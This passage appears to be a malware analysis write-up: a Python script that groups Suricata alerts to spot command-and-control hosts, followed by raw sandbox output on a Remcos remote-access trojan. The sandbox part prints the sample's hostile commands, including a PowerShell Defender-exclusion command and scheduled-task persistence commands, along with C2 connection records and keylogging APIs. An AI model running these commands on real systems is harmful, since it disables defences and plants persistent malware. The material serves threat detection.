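Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49734 -> 107.173.4.16:2560
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49727 -> 107.173.4.16:2560
Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49727 -> 107.173.4.16:2560
Source: Network traffic | Suricata IDS: 1000001 - Severity 3 - CONSTRUCTED unrelated alert : 192.168.2.6:49674 -> 198.51.100.7:443
not an alert row at all
"""

_IP = r"\d{1,3}(?:\.\d{1,3}){3}"
_ALERT_RE = re.compile(
    r"Suricata IDS:\s*(?P<sid>\d+)\s*-\s*Severity\s*(?P<sev>\d+)\s*-\s*(?P<msg>.+?)\s*:\s*"
    rf"(?P<src>{_IP}):(?P<sport>\d+)\s*->\s*(?P<dst>{_IP}):(?P<dport>\d+)"
)


@dataclass
class DestStats:
    sid: int
    severity: int
    msg: str
    alerts: int = 0                      # rows seen, duplicates included
    source_ports: set[int] = field(default_factory=set)  # distinct sessions


def parse_alert(line: str) -> dict | None:
    """Extract sid, severity, message and the 4-tuple; None for non-alert rows."""
    m = _ALERT_RE.search(line)
    if not m:
        return None
    return {
        "sid": int(m["sid"]), "sev": int(m["sev"]), "msg": m["msg"],
        "src": m["src"], "sport": int(m["sport"]),
        "dst": m["dst"], "dport": int(m["dport"]),
    }


def summarise(lines: Iterable[str]) -> dict[tuple[str, int, int], DestStats]:
    """Group alerts by (dst ip, dst port, sid)."""
    stats: dict[tuple[str, int, int], DestStats] = {}
    for line in lines:
        a = parse_alert(line)
        if a is None:
            continue
        key = (a["dst"], a["dport"], a["sid"])
        st = stats.setdefault(key, DestStats(a["sid"], a["sev"], a["msg"]))
        st.alerts += 1
        st.source_ports.add(a["sport"])
    return stats


def likely_c2(stats: dict[tuple[str, int, int], DestStats], min_sessions: int = 3) -> list[tuple[str, int]]:
    """Destinations with at least min_sessions distinct client ports, busiest first.
    Distinct ports, not alert count, are used so a repeated row is not double-counted."""
    ranked = sorted(
        (k for k, s in stats.items() if len(s.source_ports) >= min_sessions),
        key=lambda k: -len(stats[k].source_ports),
    )
    return [(dst, dport) for dst, dport, _sid in ranked]


if __name__ == "__main__":
    st = summarise(SAMPLE_LINES.splitlines())
    for (dst, dport, sid), s in st.items():
        print(f"{dst}:{dport} sid={sid} sev={s.severity} alerts={s.alerts} sessions={len(s.source_ports)} {s.msg}")
    print("likely C2:", likely_c2(st))
```

Applied to the 89 rows above it yields a single destination with 89 distinct client ports, which is the shape to expect from a RAT whose configured reconnect interval is one second and whose server closes or drops each TLS session quickly; a threshold of three is deliberately low for a sandbox run and should be raised for production telemetry.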

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000 (first argument 0x0D = WH_KEYBOARD_LL, a low-level keyboard hook)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard (clipboard write and read)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx (translates virtual-key codes to characters using the foreground window's keyboard layout)
Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4bb8f58.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4bb8f58.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4afc538.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4a3fb18.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 3048, type: MEMORYSTR

              E-Banking Fraud

              barindex
Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4bb8f58.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4bb8f58.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4afc538.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4a3fb18.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2198970718.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4586156440.0000000000BA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 5952, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 3048, type: MEMORYSTR

              Spam, unwanted Advertisements and Ransom Demands

              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 12_2_0041BB77 SystemParametersInfoW

              System Summary

              Source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
              Source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants, Author: unknown
              Source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
              Source: 0.2.file.exe.4bb8f58.3.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
              Source: 0.2.file.exe.4bb8f58.3.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants, Author: unknown
              Source: 0.2.file.exe.4bb8f58.3.unpack, type: UNPACKEDPE; Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
              Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
              Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants, Author: unknown
              Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
              Source: 0.2.file.exe.4bb8f58.3.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
              Source: 0.2.file.exe.4bb8f58.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
              Source: 0.2.file.exe.4afc538.2.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
              Source: 0.2.file.exe.4afc538.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
              Source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
              Source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants, Author: unknown
              Source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
              Source: 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
              Source: 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
              Source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR; Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
              Source: Process Memory Space: MSBuild.exe PID: 3048, type: MEMORYSTR; Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 12_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: String function: 00401F66 appears 50 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: String function: 004020E7 appears 39 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: String function: 004338A5 appears 41 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: String function: 00433FB0 appears 55 times
              Source: file.exe, 00000000.00000002.2163163869.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameclr.dllT vs file.exe
              Source: file.exe, 00000000.00000002.2174232885.0000000007130000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameArthur.dll" vs file.exe
              Source: file.exe, 00000000.00000002.2175370631.0000000007DA0000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameMontero.dll8 vs file.exe
              Source: file.exe, 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameArthur.dll" vs file.exe
              Source: file.exe, 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameMontero.dll8 vs file.exe
              Source: file.exe, 00000000.00000000.2131985782.0000000000942000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: OriginalFilenameozQm.exe4 vs file.exe
              Source: file.exe; Binary or memory string: OriginalFilenameozQm.exe4 vs file.exe
              Source: file.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Remcos_b296e965, reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.file.exe.4bb8f58.3.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Remcos_b296e965, reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.file.exe.4bb8f58.3.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.file.exe.4bb8f58.3.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Remcos_b296e965, reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.file.exe.4bb8f58.3.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Remcos_b296e965, reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.file.exe.4bb8f58.3.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.file.exe.4afc538.2.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Remcos_b296e965, reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.file.exe.4afc538.2.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Remcos_b296e965, reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Remcos_b296e965, reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants, Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Remcos_b296e965, reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Remcos_b296e965, reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR; Matched rule: Windows_Trojan_Remcos_b296e965, reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: MSBuild.exe PID: 3048, type: MEMORYSTR; Matched rule: Windows_Trojan_Remcos_b296e965, reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: file.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: DcBNSgyxoJFip.exe.0.dr; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 0.2.file.exe.7da0000.5.raw.unpack, BxloEJ2ukLoPetmOQZ.cs; Security API names: _0020.SetAccessControl
              Source: 0.2.file.exe.7da0000.5.raw.unpack, BxloEJ2ukLoPetmOQZ.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.file.exe.7da0000.5.raw.unpack, BxloEJ2ukLoPetmOQZ.cs; Security API names: _0020.AddAccessRule
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, ilyiiFeo9pEQDT6PeR.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.file.exe.4afc538.2.raw.unpack, ilyiiFeo9pEQDT6PeR.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.file.exe.4afc538.2.raw.unpack, BxloEJ2ukLoPetmOQZ.cs; Security API names: _0020.SetAccessControl
              Source: 0.2.file.exe.4afc538.2.raw.unpack, BxloEJ2ukLoPetmOQZ.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.file.exe.4afc538.2.raw.unpack, BxloEJ2ukLoPetmOQZ.cs; Security API names: _0020.AddAccessRule
              Source: 0.2.file.exe.7da0000.5.raw.unpack, ilyiiFeo9pEQDT6PeR.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, BxloEJ2ukLoPetmOQZ.cs; Security API names: _0020.SetAccessControl
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, BxloEJ2ukLoPetmOQZ.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, BxloEJ2ukLoPetmOQZ.cs; Security API names: _0020.AddAccessRule
              Source: classification engine; Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@16/11@0/1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 12_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 12_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 12_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 12_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
              Source: C:\Users\user\Desktop\file.exe; File created: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe
              Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe; Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Mutant created: \Sessions\1\BaseNamedObjects\Rmc-T6WK9E
              Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5256:120:WilError_03
              Source: C:\Users\user\Desktop\file.exe; File created: C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp
              Source: file.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: file.exe; Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\file.exe; File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\file.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: file.exe; ReversingLabs: Detection: 39%
              Source: file.exe; String found in binary or memory: PageCount-Start date is missing.MHistory is not available before '{0}'.
              Source: C:\Users\user\Desktop\file.exe; File read: C:\Users\user\Desktop\file.exe
              Source: unknown; Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\file.exe; Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp2A05.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe"Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp2A05.tmp"Jump to behavior
